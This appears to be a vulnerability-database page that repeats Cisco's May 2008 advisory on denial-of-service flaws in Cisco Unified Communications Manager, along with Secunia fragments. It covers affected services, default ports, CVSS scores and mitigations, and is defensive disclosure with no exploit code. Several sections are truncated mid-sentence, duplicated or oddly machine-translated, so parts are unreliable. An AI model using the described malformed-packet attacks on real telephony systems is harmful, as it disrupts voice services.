This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw1+86n/Gc8U/uARAlunAJ9UTjai8ZofKwUcH7B3CqyBetjIDwCdHgUI
91czchLkcIoB9pmUP9zWEI0=
=gkID
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
performing a TCP port scan on an affected system.
SOLUTION:
Update to version 6.0(3).
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
| VAR-200805-0206 | CVE-2008-1742 | Cisco Unified Communications Manager Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in the Certificate Trust List (CTL) Provider service in Cisco Unified Communications Manager (CUCM) 5.x before 5.1(3) allows remote attackers to cause a denial of service (memory consumption and service interruption) via a series of malformed TCP packets, as demonstrated by TCPFUZZ, aka Bug ID CSCsj80609. TCPFUZZ A series of deliberately created, as demonstrated by TCP Service disruption via packets (DoS) There is a possibility of being put into a state. The problem is Bug ID : CSCsj80609 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. These
vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these
vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version
can also be determined by running the command show version active via
the command line interface (CLI). No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability.
SIP-Related Vulnerabilities
Cisco Unified Communications Manager versions 5.x and 6.x contain a
vulnerability in the handling of malformed SIP JOIN messages that may
result in a DoS condition. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability. For Cisco Unified Communications Manager 5.x and 6.x
systems, the SNMP Trap service is controlled via the Cisco
CallManager SNMP Service selection on the Control Center Feature
Services screen.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
ustomers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
| VAR-200805-0207 | CVE-2008-1743 | Cisco Unified Communications Manager (CUCM) Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in the Certificate Trust List (CTL) Provider service in Cisco Unified Communications Manager (CUCM) 5.x before 5.1(3) and 6.x before 6.1(1) allows remote attackers to cause a denial of service (memory consumption and service interruption) via a series of malformed TCP packets, aka Bug ID CSCsi98433. The problem is Bug ID : CSCsi98433 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. These
vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these
vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version
can also be determined by running the command show version active via
the command line interface (CLI). No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
ustomers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
| VAR-200805-0208 | CVE-2008-1744 | Cisco Unified Communications Manager (CUCM) Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Certificate Authority Proxy Function (CAPF) service in Cisco Unified Communications Manager (CUCM) 4.1 before 4.1(3)SR7, 4.2 before 4.2(3)SR4, and 4.3 before 4.3(2) allows remote attackers to cause a denial of service (service crash) via malformed network traffic, aka Bug ID CSCsk46770. Cisco Unified Communications Manager (CUCM) There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsk46770 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. These
vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these
vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version
can also be determined by running the command show version active via
the command line interface (CLI). No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
